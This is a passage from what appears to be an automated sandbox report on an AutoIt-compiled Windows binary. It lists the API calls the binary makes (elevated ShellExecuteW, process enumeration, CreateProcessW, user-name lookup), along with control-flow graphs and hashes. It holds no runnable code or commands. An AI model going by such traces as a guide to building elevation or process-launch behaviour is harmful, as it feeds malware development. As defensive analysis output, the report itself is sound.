                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                • String ID: SCRIPT
                                                                                                                                                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                • Opcode ID: 09c22560da4813123edb778686bc1f1086ec5c3f0307fd89e21123ff066955f1
                                                                                                                                                                                                                                                                • Instruction ID: 9e4b9424ddac63c7398e9c0908acb99ea4d8024a172b5669c6cffd9734dec91b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09c22560da4813123edb778686bc1f1086ec5c3f0307fd89e21123ff066955f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4117C71200700FFD7228B65DC49F677BBAEFC5B51F208269F41696690DF71D9108A20

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00672B6B
                                                                                                                                                                                                                                                                  • Part of subcall function 00673A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00741418,?,00672E7F,?,?,?,00000000), ref: 00673A78
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00732224), ref: 006B2C10
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00732224), ref: 006B2C17
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                                                                                                                                                • String ID: runas
                                                                                                                                                                                                                                                                • API String ID: 448630720-4000483414
                                                                                                                                                                                                                                                                • Opcode ID: 2fefa127cb9df04fac42a62a94a585efb863aa25d6626e587d5daf311eb707ca
                                                                                                                                                                                                                                                                • Instruction ID: caf974f5749ec12c22537966149ce0d18662c3108d1e8569ddd835dcc32fab19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fefa127cb9df04fac42a62a94a585efb863aa25d6626e587d5daf311eb707ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF113631208382AAC754FF20D862DBE7BE6AF91710F44C52DF08A021A3CF34858AD71A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 006DD501
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 006DD50F
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 006DD52F
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006DD5DC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                                                • Opcode ID: 6ef44877694d7e01235979bbb21013709340e760973bf120a1ff95e9d0832773
                                                                                                                                                                                                                                                                • Instruction ID: a5fb10a84d72fb053baad1cdb4e4205b6868bbf83f9ae94bcf6fd3e2293a1f89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef44877694d7e01235979bbb21013709340e760973bf120a1ff95e9d0832773
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A31AF710083009FD305EF64D881AAFBBF9EF99354F104A2DF585862A2EB719945CBA3
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,006B5222), ref: 006DDBCE
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 006DDBDD
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006DDBEE
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 006DDBFA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                • Opcode ID: 387a3348ebbe473b8a6ab47164634f4d3b75fc3def0ce2447272d8a145c8206e
                                                                                                                                                                                                                                                                • Instruction ID: d9ef9d96400a50b1123b25e674410854f8a248ac0ff477940c2f42bbd0139de6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 387a3348ebbe473b8a6ab47164634f4d3b75fc3def0ce2447272d8a145c8206e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F0A0B082091497D2217B78AC0E8BA376DAE01374F208703F836C22E1EFB459558699
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(006A28E9,?,00694CBE,006A28E9,007388B8,0000000C,00694E15,006A28E9,00000002,00000000,?,006A28E9), ref: 00694D09
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00694CBE,006A28E9,007388B8,0000000C,00694E15,006A28E9,00000002,00000000,?,006A28E9), ref: 00694D10
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00694D22
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: 81d29a6bec7a64e00d76646563cf800c31f5a1e426e4fe4410559c3f8be1d9f1
                                                                                                                                                                                                                                                                • Instruction ID: 93abf86b25240ad99dc6149780b89db51434a33b153d541173bdc78987ee916f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d29a6bec7a64e00d76646563cf800c31f5a1e426e4fe4410559c3f8be1d9f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACE0B635010148EBCF16AF54DD09E987B6EFF46785B108218FC058A622CF39DD46CA88
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 006CD28C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                                • String ID: X64
                                                                                                                                                                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                • Opcode ID: 8333d096d98187048731626b2ffcf5f083eaf4eba3e5bdeda648990237d3d822
                                                                                                                                                                                                                                                                • Instruction ID: 6c5b9659df5c06ee589bf171a83f080a7d45e13bd226e594cca04ace2cb1a11a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8333d096d98187048731626b2ffcf5f083eaf4eba3e5bdeda648990237d3d822
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D0C9B480111DEACB94DB90DC88DE9B37CFB04305F104355F106A2040DB34964A8F20

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 6faff9-6fb056 call 692340 3 6fb058-6fb06b call 67b567 0->3 4 6fb094-6fb098 0->4 12 6fb06d-6fb092 call 67b567 * 2 3->12 13 6fb0c8 3->13 6 6fb0dd-6fb0e0 4->6 7 6fb09a-6fb0bb call 67b567 * 2 4->7 9 6fb0f5-6fb119 call 677510 call 677620 6->9 10 6fb0e2-6fb0e5 6->10 30 6fb0bf-6fb0c4 7->30 32 6fb11f-6fb178 call 677510 call 677620 call 677510 call 677620 call 677510 call 677620 9->32 33 6fb1d8-6fb1e0 9->33 14 6fb0e8-6fb0ed call 67b567 10->14 12->30 17 6fb0cb-6fb0cf 13->17 14->9 22 6fb0d9-6fb0db 17->22 23 6fb0d1-6fb0d7 17->23 22->6 22->9 23->14 30->6 34 6fb0c6 30->34 82 6fb17a-6fb195 call 677510 call 677620 32->82 83 6fb1a6-6fb1d6 GetSystemDirectoryW call 68fe0b GetSystemDirectoryW 32->83 35 6fb20a-6fb238 GetCurrentDirectoryW call 68fe0b GetCurrentDirectoryW 33->35 36 6fb1e2-6fb1fd call 677510 call 677620 33->36 34->17 44 6fb23c 35->44 36->35 53 6fb1ff-6fb208 call 694963 36->53 47 6fb240-6fb244 44->47 50 6fb246-6fb270 call 679c6e * 3 47->50 51 6fb275-6fb285 call 6e00d9 47->51 50->51 64 6fb28b-6fb2e1 call 6e07c0 call 6e06e6 call 6e05a7 51->64 65 6fb287-6fb289 51->65 53->35 53->51 68 6fb2ee-6fb2f2 64->68 96 6fb2e3 64->96 65->68 71 6fb39a-6fb3be CreateProcessW 68->71 72 6fb2f8-6fb321 call 6d11c8 68->72 76 6fb3c1-6fb3d4 call 68fe14 * 2 71->76 87 6fb32a call 6d14ce 72->87 88 6fb323-6fb328 call 6d1201 72->88 102 6fb42f-6fb43d CloseHandle 76->102 103 6fb3d6-6fb3e8 76->103 82->83 105 6fb197-6fb1a0 call 694963 82->105 83->44 100 6fb32f-6fb33c call 694963 87->100 88->100 96->68 112 6fb33e-6fb345 100->112 113 6fb347-6fb357 call 694963 100->113 107 6fb43f-6fb444 102->107 108 6fb49c 102->108 109 6fb3ed-6fb3fc 103->109 110 6fb3ea 103->110 105->47 105->83 114 6fb446-6fb44c CloseHandle 107->114 115 6fb451-6fb456 107->115 118 6fb4a0-6fb4a4 108->118 116 6fb3fe 109->116 117 6fb401-6fb42a GetLastError call 67630c call 67cfa0 109->117 110->109 112->112 112->113 135 6fb359-6fb360 113->135 136 6fb362-6fb372 call 694963 113->136 114->115 121 6fb458-6fb45e CloseHandle 115->121 122 6fb463-6fb468 115->122 116->117 126 6fb4e5-6fb4f6 call 6e0175 117->126 124 6fb4a6-6fb4b0 118->124 125 6fb4b2-6fb4bc 118->125 121->122 130 6fb46a-6fb470 CloseHandle 122->130 131 6fb475-6fb49a call 6e09d9 call 6fb536 122->131 124->126 127 6fb4be 125->127 128 6fb4c4-6fb4e3 call 67cfa0 CloseHandle 125->128 127->128 128->126 130->131 131->118 135->135 135->136 146 6fb37d-6fb398 call 68fe14 * 3 136->146 147 6fb374-6fb37b 136->147 146->76 147->146 147->147
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FB198
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FB1B0
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FB1D4
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FB200
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FB214
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006FB236
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FB332
                                                                                                                                                                                                                                                                  • Part of subcall function 006E05A7: GetStdHandle.KERNEL32(000000F6), ref: 006E05C6
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FB34B
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006FB366
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006FB3B6
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 006FB407
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 006FB439
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FB44A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FB45C
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006FB46E
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 006FB4E3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                • Opcode ID: 137605fe8c1e366ac12aa3a3e1ebd6d58820c27098e85895f5cc3d5d0965bc4f
                                                                                                                                                                                                                                                                • Instruction ID: 53031fc71143cad1ecf6eb795f298e7a4db1b32d07f2927e334e9d183f47b268
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 137605fe8c1e366ac12aa3a3e1ebd6d58820c27098e85895f5cc3d5d0965bc4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F198316083049FDB54EF24C891B6EBBE6AF85314F18855DF9898B3A2DB31EC41CB56
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetInputState.USER32 ref: 0067D807
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 0067DA07
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0067DB28
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0067DB7B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 0067DB89
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0067DB9F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0067DBB1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                • Opcode ID: 68f29b66e9894c19c7bb198f9c961eed6e8fa6e75db1ff7412f12b619d3fa337
                                                                                                                                                                                                                                                                • Instruction ID: 8823c9a292711d681f2be4c5317473d5982b52850e04776ef02f9a26d6165d8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68f29b66e9894c19c7bb198f9c961eed6e8fa6e75db1ff7412f12b619d3fa337
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2842EE70604242DFD729DB24C854FBAB7B2FF86304F148A1EE95A87391C774E885CB96

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00672D07
                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00672D31
                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00672D42
                                                                                                                                                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00672D5F
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00672D6F
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A9), ref: 00672D85
                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00672D94
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                • Opcode ID: c6af64556f07bcc3b390e89901f9bce4a967cefee4e0f1052c8a151cf6c21d27
                                                                                                                                                                                                                                                                • Instruction ID: 0bc84db1221c8c6c3c14aa39828348d366dce0043238d788691fd9088901b950
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6af64556f07bcc3b390e89901f9bce4a967cefee4e0f1052c8a151cf6c21d27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321E3B5911248EFDB01EFA4EC49BDDBBB4FB09700F00821AF511A62A0DBB91584CF98

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 457 6b065b-6b068b call 6b042f 460 6b068d-6b0698 call 69f2c6 457->460 461 6b06a6-6b06b2 call 6a5221 457->461 468 6b069a-6b06a1 call 69f2d9 460->468 466 6b06cb-6b0714 call 6b039a 461->466 467 6b06b4-6b06c9 call 69f2c6 call 69f2d9 461->467 476 6b0781-6b078a GetFileType 466->476 477 6b0716-6b071f 466->477 467->468 478 6b097d-6b0983 468->478 479 6b078c-6b07bd GetLastError call 69f2a3 CloseHandle 476->479 480 6b07d3-6b07d6 476->480 482 6b0721-6b0725 477->482 483 6b0756-6b077c GetLastError call 69f2a3 477->483 479->468 494 6b07c3-6b07ce call 69f2d9 479->494 486 6b07d8-6b07dd 480->486 487 6b07df-6b07e5 480->487 482->483 488 6b0727-6b0754 call 6b039a 482->488 483->468 491 6b07e9-6b0837 call 6a516a 486->491 487->491 492 6b07e7 487->492 488->476 488->483 499 6b0839-6b0845 call 6b05ab 491->499 500 6b0847-6b086b call 6b014d 491->500 492->491 494->468 499->500 506 6b086f-6b0879 call 6a86ae 499->506 507 6b087e-6b08c1 500->507 508 6b086d 500->508 506->478 510 6b08c3-6b08c7 507->510 511 6b08e2-6b08f0 507->511 508->506 510->511 513 6b08c9-6b08dd 510->513 514 6b097b 511->514 515 6b08f6-6b08fa 511->515 513->511 514->478 515->514 516 6b08fc-6b092f CloseHandle call 6b039a 515->516 519 6b0963-6b0977 516->519 520 6b0931-6b095d GetLastError call 69f2a3 call 6a5333 516->520 519->514 520->519
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006B039A: CreateFileW.KERNEL32(00000000,00000000,?,006B0704,?,?,00000000,?,006B0704,00000000,0000000C), ref: 006B03B7
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006B076F
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 006B0776
                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 006B0782
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006B078C
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 006B0795
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 006B07B5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 006B08FF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 006B0931
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 006B0938
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                • Opcode ID: f50148262f7b788279c75854cf5b2d6960841e94f13d83ca7d9fa040195d1562
                                                                                                                                                                                                                                                                • Instruction ID: 989017e28c660199752c160f2dee3dadd58536f147512033f249d9d436477836
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f50148262f7b788279c75854cf5b2d6960841e94f13d83ca7d9fa040195d1562
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15A13772A101048FEF19EF68D851BEE7FA2AB06320F14416EF811DB392DB359D52CB95

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
